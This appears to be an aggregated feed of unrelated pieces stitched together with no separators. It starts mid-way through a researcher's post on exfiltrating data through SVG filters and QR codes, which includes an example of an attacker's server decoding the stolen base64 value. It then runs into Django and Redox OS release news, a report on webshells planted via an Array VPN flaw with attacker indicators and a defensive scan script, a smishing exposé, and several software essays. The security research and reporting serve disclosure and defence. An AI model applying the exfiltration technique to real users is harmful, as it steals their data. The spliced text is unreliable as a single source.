Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.
Once the user opens the URL, your server gets the request and receives the data from the URL.
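On the receiving end there is nothing exotic: the ?ref= value in the example URL above is plain base64, so the attacker's server just decodes it (a tiny sketch; the URL and parameter name are simply the ones from the example):

import base64
from urllib.parse import parse_qs, urlparse

url = "https://lyra.horse/?ref=c3VwZXIgc2VjcmV0IGluZm8"
ref = parse_qs(urlparse(url).query)["ref"][0]
ref += "=" * (-len(ref) % 4)     # restore any stripped base64 padding
print(base64.b64decode(ref))     # b'super secret info'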
There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.
You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the pointer cursor and reacts to fake buttons inside your SVG to make the exfiltration more realistic.
Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.
Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.
This is the first time in my security research I’ve found a completely new technique!
I introduced it briefly at my BSides talk in September , and this post here is a more in-depth overview of the technique and how it can be used.
Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?
Here’s some previous research I’ve found:
I don’t think me discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.
That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what Antonymph was born out of.
In any case,
whoa this post took such a long time for me to get done!
i started work on it in july, and was expecting to release it alongside my CSS talk in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.
unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.
also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings. finding responsibility is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and youre the one ive always wanted is slightly nsfw doggyhell vent art.
btw i’ll soon be giving talks at 39c3 and disobey 2026 ! the 39c3 one is titled “ css clicker training ” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.
see y’all around!!
<3
Note: If you’re making content (articles, videos etc) based on this post, feel free to reach out to me with questions or for feedback.
Django 6.0 released . Django 6.0 includes a flurry of neat features , but the two that most caught my eye are background workers and template partials .
Background workers started out as DEP (Django Enhancement Proposal) 14 , proposed and shepherded by Jake Howard. Jake prototyped the feature in django-tasks and wrote this extensive background on the feature when it landed in core just in time for the 6.0 feature freeze back in September.
Kevin Wetzels published a useful first look at Django's background tasks based on the earlier RC, including notes on building a custom database-backed worker implementation.
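Here's a rough sketch of what defining and enqueueing a task looks like, based on the DEP 14 / django-tasks style API; the exact import paths, decorator form and settings keys are assumptions on my part, so check the Django 6.0 docs before copying any of it:

# settings.py (assumed settings key and backend path)
TASKS = {
    "default": {
        "BACKEND": "django.tasks.backends.immediate.ImmediateBackend",
    }
}

# tasks.py
from django.core.mail import send_mail
from django.tasks import task

@task()
def send_welcome_email(to_address):
    # Runs on whichever task backend is configured, not during the request.
    send_mail("Welcome!", "Thanks for signing up.",
              "noreply@example.com", [to_address])

# views.py (inside a view)
send_welcome_email.enqueue("new-user@example.com")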
Template Partials were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from the documentation showing the neat inline attribute which lets you both use and define a partial at the same time:
{# Define and render immediately. #}
{% partialdef user-info inline %}
  <div id="user-info-{{ user.username }}">
    <h3>{{ user.name }}</h3>
    <p>{{ user.bio }}</p>
  </div>
{% endpartialdef %}

{# Other page content here. #}

{# Reuse later elsewhere in the template. #}
<section class="featured-authors">
  <h2>Featured Authors</h2>
  {% for user in featured %}
    {% partial user-info %}
  {% endfor %}
</section>
You can also render just a named partial from a template directly in Python code like this:
return render(request, "authors.html#user-info", {"user": user})
I'm looking forward to trying this out in combination with HTMX .
I asked Claude Code to dig around in my blog's source code looking for places that could benefit from a template partial. Here's the resulting commit that uses them to de-duplicate the display of dates and tags from pages that list multiple types of content, such as my tag pages .
I take tap dance evening classes at the College of San Mateo community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.
I recently wrote about Coutellerie Nontronnaise on my Niche Museums website, a historic knife manufactory in Nontron, France. They had a certificate on the wall claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.
I posed this as a text message challenge to the librarians, and they tracked down the exact page from the 1989 "Le livre guinness des records" describing the record!
Le plus petit
Les établissements Nontronnaise ont réalisé un couteau de 10 mm de long, pour le Festival d’Aubigny, Vendée, qui s’est déroulé du 4 au 5 juillet 1987.
(“The smallest: the Nontronnaise works made a knife 10 mm long for the Festival d’Aubigny, Vendée, which took place on 4–5 July 1987.”)
Thank you, Maria at the CSM library.
Redox OS is a complete Unix-like general-purpose microkernel-based operating system written in Rust. November was a very exciting month for Redox! Here’s all the latest news.
If you would like to support Redox, please consider donating or buying some merch!
Jeremy Soller successfully ported the Smallvil Wayland compositor example from the Smithay framework and GTK3 Wayland to Redox. Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing), Wildan Mubarok (bug fixing and implementation of missing functions), and other contributors for making it possible. Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support, but this represents a huge step forward.
Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to the other contributors who helped us achieve this.
This is the first full-featured browser engine ported to Redox, allowing most websites to work.
Jeremy Soller was porting MATE Marco to get a better X11 window manager and decided to port a basic MATE desktop as well.
Jeremy Soller added and fixed many driver timeouts to block more infinite-loop bugs and let booting continue. He also updated system components and drivers to daemonize after starting, and moved hardware initialization into their child processes to fix hangs and allow the boot to continue on more hardware.
If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.
The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use i586 as the CPU architecture target name for 32-bit x86 computers.
Jeremy Soller and Wildan Mubarok implemented a feature that allows recipes to declare which build tools they need, with those build tools themselves being available as recipes. This will bring several benefits.
Jeremy Soller unified the build system repositories, merging the submodules into the main build system repository . This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.
If you haven’t updated your build system yet, you should back up your changes, and either run the make distclean pull container_clean all command, or download a new build system copy (git clone https://gitlab.redox-os.org/redox-os/redox.git) and build from scratch.
After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again) and AI scrapers were consuming the server resources, making it very slow. As a consequence, we increased our protection, which changed some things, including git push usage. The book has been updated with instructions on how to configure your PAT.
Other changes this month:

- kfpath in some schemes
- F_DUPFD_CLOEXEC
- kfpath on the DTB scheme
- The alxd, ihdad, ac97d, and sb16d drivers were updated to use the redox-scheme library, which makes them up-to-date
- The drivers repository was merged into the base repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration
- MSG_DONTWAIT in Unix Domain Sockets
- SO_PEERCRED in Unix streams
- The fpath() function in the proc scheme
- The fstat() function in the IPC daemon
- fevent() function handling
- SO_SNDBUF in the IPC daemon
- minimal variants
- The sys/queue.h function group
- The ppoll() function
- The ai_addrlen and socklen_t type definitions
- The posix_fallocate() function
- The getpeername() function in Unix streams
- The getsubopt() function
- The fpath() function was updated to use the new scheme format
- The orbclient example
- The orbclient library gradient calculation
- librsvg compilation
- An option (the FSTOOLS_IN_PODMAN environment variable) to build and run the filesystem tools in the Podman container; it fixes a problem with FUSE on MacOS, NixOS and GuixSD
- The REPO_BINARY option to cache downloaded packages between image rebuilds
- The uc.recipe recipe target
- The REPO_OFFLINE (offline mode) environment variable
- The make cook (build the filesystem-enabled recipes), make push (only install recipe packages with changes in an existing QEMU image), make tree (show the filesystem configuration recipes and recipe dependencies tree), make find (show recipe package locations), and make mount_live (mount the live disk ISO) commands
- The make x.--all (run a recipe option in all recipes) and make x.--category-category-name (run a recipe option in a recipe category folder) commands
- The source.shallow_clone data type (to enable Git shallow clone in recipes)
- The CI (disable parallel recipe fetch/build and Cookbook TUI), COOKBOOK_MAKE_JOBS (set the number of CPU threads for recipe compilation), COOKBOOK_VERBOSE (enable more recipe log information) and COOKBOOK_LOGS (save recipe logs at build/logs/$TARGET) environment variables
To test the changes of this month, download the server or desktop variants of the daily images. Use the desktop variant for a graphical interface. If you prefer a terminal-style interface, or if the desktop variant doesn’t work, please try the server variant.
Read the following pages to learn how to use the images in a virtual machine or real hardware:
Sometimes the daily images are outdated and you need to build Redox from source. For instructions on how to do this, read the Building Redox page.
If you want to contribute, give feedback or just listen in to the conversation, join us on Matrix Chat .
President, The McDonald’s Division
Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.
Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.
In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.
He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.
Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.
Array Networks fixed the vulnerability in a May security update but has not assigned it a CVE identifier, which complicates tracking the flaw and managing patches.
An advisory from Japan’s Computer Emergency Response Team Coordination Center (JPCERT/CC) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.
The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.
“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).
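For defenders who can export access or system logs from the appliance, or from a proxy sitting in front of it, a rough triage script like the following flags both published indicators; the log paths, formats and even whether such an export is possible are assumptions rather than vendor guidance:

import sys

IOC_IP = "194.233.100.138"        # attack and communication IP from the advisory
IOC_PATH = "/ca/aproxy/webapp/"   # webshell drop path from the advisory

def scan(log_path):
    # Print any log line that mentions either indicator.
    with open(log_path, errors="replace") as handle:
        for lineno, line in enumerate(handle, 1):
            if IOC_IP in line or IOC_PATH in line:
                print(f"{log_path}:{lineno}: {line.rstrip()}")

if __name__ == "__main__":
    for path in sys.argv[1:]:
        scan(path)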
The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.
JPCERT says that Array OS version 9.4.5.9 addresses the problem and provides the following workarounds if updating is not possible:
Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.
Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.
Macnica security researcher Yutaka Sejiyama reported on X that his scans returned 1,831 Array AG instances worldwide, primarily in China, Japan, and the United States.
The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that the possibility of more hosts with DesktopDirect active is significant.
“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.
BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.
Last year, CISA warned about active exploitation targeting CVE-2023-28461 , a critical remote code execution in Array Networks AG and vxAG ArrayOS.
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.
Over the past week, thousands of domain names were registered for scam websites that purport to offer T-Mobile customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.
An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.
The website scanning service urlscan.io shows thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.
A phishing website registered this week that spoofs T-Mobile.
If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then link the victim’s card to a mobile device that they physically control .
Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting AT&T customers:
An SMS phishing or “smishing” website targeting AT&T users.
Ford Merrill works in security research at SecAlliance , a CSIS Security Group company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.
“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.
A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.
A text message that spoofs the District of Columbia’s Office of Tax and Revenue.
Many SMS phishing or “smishing” domains are quickly flagged by browser makers as malicious. But Merrill said one burgeoning area of growth for these phishing kits — fake e-commerce shops — can be far harder to spot because they do not call attention to themselves by spamming the entire world.
Merrill said the same Chinese phishing kits used to blast out package redelivery message scams are equipped with modules that make it simple to quickly deploy a fleet of fake but convincing e-commerce storefronts. Those phony stores are typically advertised on Google and Facebook , and consumers usually end up at them by searching online for deals on specific products.
A machine-translated screenshot of an ad from a China-based phishing group promoting their fake e-commerce shop templates.
With these fake e-commerce stores, the customer is supplying their payment card and personal information as part of the normal check-out process, which is then punctuated by a request for a one-time code sent by your financial institution. The fake shopping site claims the code is required by the user’s bank to verify the transaction, but it is sent to the user because the scammers immediately attempt to enroll the supplied card data in a mobile wallet.
According to Merrill, it is only during the check-out process that these fake shops will fetch the malicious code that gives them away as fraudulent, which tends to make it difficult to locate these stores simply by mass-scanning the web. Also, most customers who pay for products through these sites don’t realize they’ve been snookered until weeks later when the purchased item fails to arrive.
“The fake e-commerce sites are tough because a lot of them can fly under the radar,” Merrill said. “They can go months without being shut down, they’re hard to discover, and they generally don’t get flagged by safe browsing tools.”
Happily, reporting these SMS phishing lures and websites is one of the fastest ways to get them properly identified and shut down. Raymond Dijkxhoorn is the CEO and a founding member of SURBL , a widely-used blocklist that flags domains and IP addresses known to be used in unsolicited messages, phishing and malware distribution. SURBL has created a website called smishreport.com that asks users to forward a screenshot of any smishing message(s) received.
“If [a domain is] unlisted, we can find and add the new pattern and kill the rest” of the matching domains, Dijkxhoorn said. “Just make a screenshot and upload. The tool does the rest.”
The SMS phishing reporting site smishreport.com.
Merrill said the last few weeks of the calendar year typically see a big uptick in smishing — particularly package redelivery schemes that spoof the U.S. Postal Service or commercial shipping companies.
“Every holiday season there is an explosion in smishing activity,” he said. “Everyone is in a bigger hurry, frantically shopping online, paying less attention than they should, and they’re just in a better mindset to get phished.”
As we can see, adopting a shopping strategy of simply buying from the online merchant with the lowest advertised prices can be a bit like playing Russian Roulette with your wallet. Even people who shop mainly at big-name online stores can get scammed if they’re not wary of too-good-to-be-true offers (think third-party sellers on these platforms).
If you don’t know much about the online merchant that has the item you wish to buy, take a few minutes to investigate its reputation. If you’re buying from an online store that is brand new, the risk that you will get scammed increases significantly. How do you know the lifespan of a site selling that must-have gadget at the lowest price? One easy way to get a quick idea is to run a basic WHOIS search on the site’s domain name. The more recent the site’s “created” date, the more likely it is a phantom store.
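If you'd rather script that check than eyeball raw WHOIS output, a quick sketch along these lines works (it assumes the standard whois command-line tool is installed; field names vary by registry, so it just surfaces any line that looks like a creation or registration date):

import subprocess
import sys

def creation_date_lines(domain):
    # Shell out to the system `whois` tool and keep date-looking lines.
    output = subprocess.run(["whois", domain],
                            capture_output=True, text=True).stdout
    return [line.strip() for line in output.splitlines()
            if "creat" in line.lower() or "registered on" in line.lower()]

if __name__ == "__main__":
    for line in creation_date_lines(sys.argv[1]):
        print(line)

A domain registered only days or weeks ago is a strong hint that the bargain storefront is a phantom store.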
If you receive a message warning about a problem with an order or shipment, visit the e-commerce or shipping site directly, and avoid clicking on links or attachments — particularly missives that warn of some dire consequences unless you act quickly. Phishers and malware purveyors typically seize upon some kind of emergency to create a false alarm that often causes recipients to temporarily let their guard down.
But it’s not just outright scammers who can trip up your holiday shopping: Often times, items that are advertised at steeper discounts than other online stores make up for it by charging way more than normal for shipping and handling.
So be careful what you agree to: Check to make sure you know how long the item will take to be shipped, and that you understand the store’s return policies. Also, keep an eye out for hidden surcharges, and be wary of blithely clicking “ok” during the checkout process.
Most importantly, keep a close eye on your monthly statements. If I were a fraudster, I’d most definitely wait until the holidays to cram through a bunch of unauthorized charges on stolen cards, so that the bogus purchases would get buried amid a flurry of other legitimate transactions. That’s why it’s key to closely review your credit card bill and to quickly dispute any charges you didn’t authorize.
Stardust is a unikernel operating system designed to run Cloud applications in a protected, single-address space environment. It delegates the management of physical resources to an underlying hypervisor which is treated as a trusted platform. Stardust has a small code base that can be maintained easily, and relies on static linking to combine a minimal kernel with a single application, along with the libraries and associated programming language run-time required for the execution of the application. Due to static linking, an executable binary of Stardust is packaged within an immutable single-purpose virtual machine image. Stardust supports multiple cores, preemptive threads, and basic block and networking drivers, and provides a collection of standard POSIX-compatible libraries.
Stardust is being used in supporting the teaching and research activities at the University of St Andrews.
The project’s repositories include software libraries ported to Stardust for experimentation (written in C) and a fork of rust-lang/rust.
The UK's National Cyber Security Center (NCSC) announced the testing phase of a new service called Proactive Notifications, designed to inform organizations in the country of vulnerabilities present in their environment.
The service is delivered through cybersecurity firm Netcraft and is based on publicly available information and internet scanning.
The NCSC will identify organizations that lack essential security services and will contact them with specific software update recommendations that address unpatched vulnerabilities.
This may include recommendations on specific CVEs or general security issues, such as the use of weak encryption.
“Scanning and notifications will be based on external observations such as the version number publicly advertised by the software,” NCSC explains , adding that this activity is “in compliance with the Computer Misuse Act.”
The agency highlights that the emails sent through this service originate from netcraft.com addresses, do not include attachments, and do not request payments, personal details, or any other kind of information.
BleepingComputer learned that the pilot program will cover UK domains and IP addresses from Autonomous System Numbers (ASNs) in the country.
The service will not cover all systems or vulnerabilities, though, and the recommendation is that entities do not rely on it alone for security alerts.
Organizations are strongly encouraged to sign up for the more mature ‘Early Warning’ service to receive timely notifications for security issues affecting their networks.
Early Warning is a free service from NCSC that alerts on potential cyberattacks, vulnerabilities, or other suspicious activity in a company's network.
It works by aggregating public, private, and government cyber-threat intelligence feeds and cross-referencing them with the domains and IP addresses of enrolled organizations to spot signs of active compromises.
Proactive Notification is triggered before a direct threat or compromise is detected, when NCSC becomes aware of a risk relevant to an organization’s setup.
Together, the two services will form a layered security approach. Proactive Notification helps with hardening systems and reducing risks, while Early Warning will pick up what still manages to slip through.
The NCSC has not provided a timeline for the Proactive Notifications program exiting the pilot phase and becoming more broadly available.
When people think of package managers, they usually picture installing a library, but these days package managers and their associated registries handle dozens of distinct functions.
A package manager is a tool that automates the process of installing, updating, configuring, and removing software packages. In practice, modern language package managers have accumulated responsibilities far beyond this definition.
An installer: downloads a package archive from the registry, extracts it and places it in your language’s load path so your code can import it.
An updater: checks for newer versions of installed packages, downloads them, and replaces the old versions, either one at a time or everything at once.
A dependency resolver: when you install a package, you install its dependencies, and their dependencies, and so on, and the resolver figures out which versions can coexist, which is NP-complete and therefore slow, difficult, and full of trade-offs (see the sketch after this list).
A local cache: stores downloaded packages on disk so subsequent installs don’t hit the network, enabling offline installs and faster builds while raising questions about cache invalidation when packages change.
A command runner: executes a package’s CLI tool without permanently installing it by downloading the package, running the command, and cleaning up, which is useful for one-off tasks or trying tools without committing to them.
A script executor: runs scripts defined in your manifest file, whether build, test, lint, deploy, or any custom command, providing a standard way to invoke project tasks without knowing the underlying tools.
A manifest format: a file that declares your project’s dependencies with version constraints, plus metadata like name, version, description, author, license, repository URL, keywords, and entry points, serving as the source of truth for what your project needs.
A lockfile format: records the exact versions of every direct and transitive dependency that were resolved, often with checksums to verify integrity, ensuring everyone working on the project gets identical dependencies.
Dependency types: distinguishes between runtime dependencies, development dependencies, peer dependencies, and optional dependencies, each with different semantics for when they get installed and who’s responsible for providing them.
Overrides and resolutions: lets you force specific versions of transitive dependencies when the default resolution doesn’t work, useful for patching security issues or working around bugs before upstream fixes them.
Workspaces: manages multiple packages in a single repository, sharing dependencies and tooling across a monorepo while still publishing each package independently.
An index: lists all published versions of a package with release dates and metadata, letting you pick a specific version or see what’s available, and is the baseline data most tooling relies on.
A publishing platform: packages your code into an archive, uploads it to the registry, and makes it available for anyone to install, handling versioning, metadata validation, and release management.
A namespace: every package needs a unique name, and most registries use flat namespaces where names are globally unique and first-come-first-served, making short names scarce and valuable, though some support scoped names for organizations or use reverse domain notation to avoid conflicts.
A search engine: the registry website lets you find packages by name, keyword, or category, with results sorted by downloads, recent activity, or relevance, and is often the first place developers go when looking for a library.
A documentation host: renders READMEs on package pages, displays changelogs, and sometimes generates API documentation from source code, with some registries hosting full documentation sites separate from the package listing.
A download counter: tracks how often each package and version gets downloaded, helping developers gauge popularity, identify abandoned projects, and make decisions about which libraries to trust.
A dependency graph API: exposes the full tree of what depends on what, both for individual packages and across the entire registry, which security tools use to trace vulnerability impact and researchers use to study ecosystem structure.
A CDN: distributes package downloads across edge servers worldwide, and since a popular registry handles billions of requests per week, caching, geographic distribution, and redundancy matter because outages affect millions of builds.
A binary host: stores and serves precompiled binaries for packages that include native code, with different binaries for different operating systems, architectures, and language versions, saving users from compiling C extensions themselves.
A build farm: some registries compile packages from source on their own infrastructure, producing binaries that users can trust weren’t tampered with on a developer’s laptop and ensuring consistent build environments.
A mirror: organizations run internal copies of registries for reliability, speed, or compliance, since some companies need packages to come from their own infrastructure, and registries provide protocols and tooling to make this work.
A deprecation policy: rules for marking packages as deprecated, transferring ownership of abandoned packages, or removing code entirely, addressing what happens when a maintainer disappears or a package becomes harmful and balancing immutability against the need to fix mistakes.
An authentication system: publishers need accounts to upload packages, so registries handle signup, login, password reset, two-factor authentication, and API tokens with scopes and expiration, since account security directly affects supply chain security.
An access control system: registries determine who can publish or modify which packages through maintainer lists, organization teams, and role-based permissions, with some supporting granular controls like publish-only tokens or requiring multiple maintainers to sign off on releases.
Trusted publishing: some registries allow CI systems to publish packages using short-lived OIDC tokens instead of long-lived secrets, so you don’t have to store credentials in your build environment and compromised tokens expire quickly.
An audit log: registries record who published what package, when, from what IP address, and using what credentials, useful for forensics after a compromise or just understanding how a package evolved.
Integrity verification: registries provide checksums that detect corrupted or tampered downloads independent of signatures, so even without cryptographic verification you know you got what the registry sent.
A signing system: registries support cryptographic signatures that verify who published a package and that it hasn’t been tampered with. Build provenance attestations can prove a package was built from specific source code in a specific environment.
A security advisory database: registries maintain a catalog of known vulnerabilities mapped to affected package versions, so when a CVE is published they track which packages and version ranges are affected and tools can warn users.
A vulnerability scanner: checks your installed dependencies against the advisory database and flags packages with known security issues, often running automatically during install or as a separate audit command.
A malware scanner: registries analyze uploaded packages for malicious code before or after they’re published, where automated static analysis catches obvious patterns but sophisticated attacks often require human review.
A typosquatting detector: registries scan for package names that look like misspellings of popular packages, which attackers register to catch developers who mistype an install command, and try to detect and block them before they cause harm.
An SBOM generator: produces software bills of materials listing every component in your dependency tree, used for compliance, auditing, and tracking what’s actually running in production.
A security team: registries employ people who triage vulnerability reports, investigate suspicious packages, coordinate takedowns, and respond to incidents, because automation helps but humans make the judgment calls.
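To make the resolver and lockfile roles above concrete, here is a minimal sketch in Python. The package index, the constraint syntax, and the lockfile layout are all hypothetical, and real resolvers (npm, pip, cargo) also handle transitive dependencies, version ranges, and backtracking.
import json

# Hypothetical registry index: package name -> available versions, oldest to newest.
INDEX = {
    "left-pad": ["1.0.0", "1.1.0", "1.3.0"],
    "is-even": ["0.1.0", "1.0.0"],
}

def satisfies(version: str, constraint: str) -> bool:
    # Only exact pins ("==1.0.0") and a wildcard ("*") are supported in this sketch.
    if constraint == "*":
        return True
    return version == constraint.removeprefix("==")

def resolve(manifest: dict[str, str]) -> dict[str, str]:
    # Pick the newest version of each requested package that satisfies its constraint.
    resolved = {}
    for name, constraint in manifest.items():
        candidates = [v for v in INDEX[name] if satisfies(v, constraint)]
        if not candidates:
            raise RuntimeError(f"no version of {name} satisfies {constraint}")
        resolved[name] = candidates[-1]
    return resolved

if __name__ == "__main__":
    manifest = {"left-pad": "*", "is-even": "==1.0.0"}
    lockfile = resolve(manifest)
    # A lockfile records the exact resolved versions so installs are reproducible.
    print(json.dumps(lockfile, indent=2))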
So what is a package manager? It depends how far you zoom out. At the surface, it’s a command that installs libraries. One level down, it’s a dependency resolver and a reproducibility tool. Further still, it’s a publishing platform, a search engine, a security operation, and part of global infrastructure.
And how does all of this get funded and supported on an ongoing basis? Sponsorship programs, foundation grants, corporate backing, or just volunteer labor - it varies widely and often determines what’s possible.
jj is a Git-compatible version control system that is both simple and powerful. See the installation instructions to get started.
The documentation has moved from https://jj-vcs.github.io/jj/ to https://docs.jj-vcs.dev/. 301 redirects are being issued towards the new domain, so any existing links should not be broken.
Fixed a race condition that could cause divergent operations when running concurrent jj commands in colocated repositories. It is now safe to continuously run e.g. jj log without --ignore-working-copy in one terminal while you're running other commands in another terminal. #6830
jj now ignores $PAGER set in the environment and uses less -FRX on most platforms (:builtin on Windows). See the docs for more information, and #3502 for motivation.
In filesets or path patterns, glob matching is enabled by default. You can use cwd:"path" to match literal paths.
In the following commands, string pattern arguments are now parsed the same way they are in revsets and can be combined with logical operators: jj bookmark delete/forget/list/move, jj tag delete/list, jj git clone/fetch/push.
In the following commands, unmatched bookmark/tag names are no longer an error. A warning will be printed instead: jj bookmark delete/forget/move/track/untrack, jj tag delete, jj git clone/push.
The default string pattern syntax in revsets will be changed to glob: in a future release. You can opt in to the new default by setting ui.revsets-use-glob-by-default=true.
Upgraded scm-record from v0.8.0 to v0.9.0. See release notes at https://github.com/arxanas/scm-record/releases/tag/v0.9.0.
The minimum supported Rust version (MSRV) is now 1.89.
On macOS, the deprecated config directory ~/Library/Application Support/jj is not read anymore. Use $XDG_CONFIG_HOME/jj instead (defaults to ~/.config/jj).
Sub-repos are no longer tracked. Any directory containing .jj or .git is ignored. Note that Git submodules are unaffected by this.
The --destination/-d arguments for jj rebase, jj split, jj revert, etc. were renamed to --onto/-o. The reasoning is that --onto, --insert-before, and --insert-after are all destination arguments, so calling one of them --destination was confusing and unclear. The old names will be removed at some point in the future, but we realize that they are deep in muscle memory, so you can expect an unusually long deprecation period.
jj describe --edit is deprecated in favor of --editor.
The config options git.auto-local-bookmark and git.push-new-bookmarks are deprecated in favor of remotes.<name>.auto-track-bookmarks. For example:
[remotes.origin]
auto-track-bookmarks = "glob:*"
For more details, refer to the docs.
The flag --allow-new on jj git push is deprecated. In order to push new bookmarks, please track them with jj bookmark track. Alternatively, consider setting up an auto-tracking configuration to avoid the chore of tracking bookmarks manually. For example:
[remotes.origin]
auto-track-bookmarks = "glob:*"
For more details, refer to the docs.
jj commit, jj describe, jj squash, and jj split now accept --editor, which ensures an editor will be opened with the commit description even if one was provided via --message/-m.
All jj commands show a warning when the provided fileset expression doesn't match any files.
Added a files() template function to DiffStats. This supports per-file stats like lines_added() and lines_removed().
Added a join() template function. This is different from separate() in that it adds a separator between all arguments, even if empty.
The RepoPath template type now has an absolute() -> String method that returns the absolute path as a string.
Added a format_path(path) template that controls how file paths are printed with jj file list.
New built-in revset aliases visible() and hidden().
Unquoted * is now allowed in revsets. bookmarks(glob:foo*) no longer needs quoting.
jj prev/next --no-edit now generates an error if the working-copy commit has children.
A new config option remotes.<name>.auto-track-bookmarks can be set to a string pattern. New bookmarks matching it will be automatically tracked for the specified remote. See the docs.
jj log now supports a --count flag to print the number of commits instead of displaying them.
jj fix now prints a warning if a tool failed to run on a file. #7971
Shell completion now works with non-normalized paths, fixing the previous panic and allowing prefixes containing . or .. to be completed correctly. #6861
Shell completion now always uses forward slashes to complete paths, even on Windows. This makes completion results usable when using jj in Git Bash. #7024
Unexpected keyword arguments now return a parse failure for the coalesce() and concat() templating functions.
The Nushell completion script documentation now includes the -f option, to keep it up to date. #8007
Ensured that with Git submodules, remnants of your submodules do not show up in the working copy after running jj new. #4349
Thanks to the people who made this release happen!
I realized recently that rather than using “the right tool for the job” I’ve been using the tool at the job and that’s mostly determined the programming languages I know. So over the last couple months I’ve put a lot of time into experimenting with languages I don’t get to use at work. My goal hasn’t been proficiency; I’m more interested in forming an opinion on what each language is good for.
Programming languages differ along so many axes that it can be hard to compare them without defaulting to the obviously true but 1) entirely boring and 2) not-that-helpful conclusion that there are trade-offs. Of course there are trade-offs. The important question is, why did this language commit to this particular set of trade-offs?
That question is interesting to me because I don’t want to choose a language based on a list of features as if I were buying a humidifier. I care about building software and I care about my tools. In making the trade-offs they make, languages express a set of values. I’d like to find out which values resonate with me.
That question is also useful in clarifying the difference between languages that, at the end of the day, have feature sets that significantly overlap. If the number of questions online about “Go vs. Rust” or “Rust vs. Zig” is a reliable metric, people are confused. It’s hard to remember, say, that language X is better for writing web services because it has features a, b, and c whereas language Y only has features a and b. Easier, I think, to remember that language X is better for writing web services because language Y was designed by someone who hates the internet (let’s imagine) and believes we should unplug the whole thing.
